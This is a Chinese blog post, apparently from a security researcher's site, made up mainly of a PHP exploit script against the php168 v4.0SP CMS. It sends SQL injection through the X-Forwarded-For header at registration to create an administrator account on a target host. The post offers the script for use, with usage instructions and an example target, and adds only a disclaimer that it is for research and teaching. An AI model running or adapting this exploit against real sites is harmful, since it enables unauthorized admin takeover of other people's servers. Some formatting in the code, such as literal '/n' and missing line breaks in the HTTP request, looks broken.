作者:amxku
来源:amxku’s blog
漏洞本身的成因没什么好说的,老掉牙的x-forwarded-for的问题,我想这个漏洞很多人都找到了。
因为这个漏洞也有些时间了,当时只是在pc上测试了一下,可能有些错误,有兴趣的同学可以自己研究一下。
<?php print_r(" +------------------------------------------------------------------+ Create New Admin Exploit For php168 v4.0SP/n amxku.net +------------------------------------------------------------------+ "); if ($argc<4) { echo "Usage: php ".$argv[0]." host path uid/n"; echo "host: target server /n"; echo "path: path to php168/n"; echo "uid: the user uid/n"; echo "Example:"; echo "php ".$argv[0]." www.php168.com / 123345/n"; die; } $host=$argv[1]; $path=$argv[2]; $id=$argv[3]+2; $cmd = "xxxx','0','111','0','1','', '', '123', '123', '123', '123', '0', '', '0', '', '', '', ''),('".$id."', '0', '3', '', '1', '0', '', '1', '1', '1', '1', '1', '1', '1', '', '', '1', '1', '1', '1', '0', '', '0', '', '', '', '')/*"; $content_1= "username=amxku&[email protected]&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2"; $content_2= "username=amxku&[email protected]&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2"; senddate($content_1); senddate($content_2); function senddate($content){ global $path,$host,$cmd; $data = "POST ".$path."reg.php"." HTTP/1.1"; $data .= "Accept: */*"; $data .= "Accept-Language: zh-cn"; $data .= "Content-Type: application/x-www-form-urlencoded"; $data .= "User-Agent: Mozilla/4.0"; $data .= "Host: ".$host.""; $data .= "x-forwarded-for: ".$cmd.""; $data .= "Content-length: ".strlen($content).""; $data .= "Connection: Keep-Alive"; $data .= ""; $data .= $content.""; $sendto=fsockopen($host,80); if (!$sendto) { echo 'No response from '.$host; die; } fputs($sendto,$data); fclose($sendto); }; echo "Create a successful administrator/n amxku.net"; ?> 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论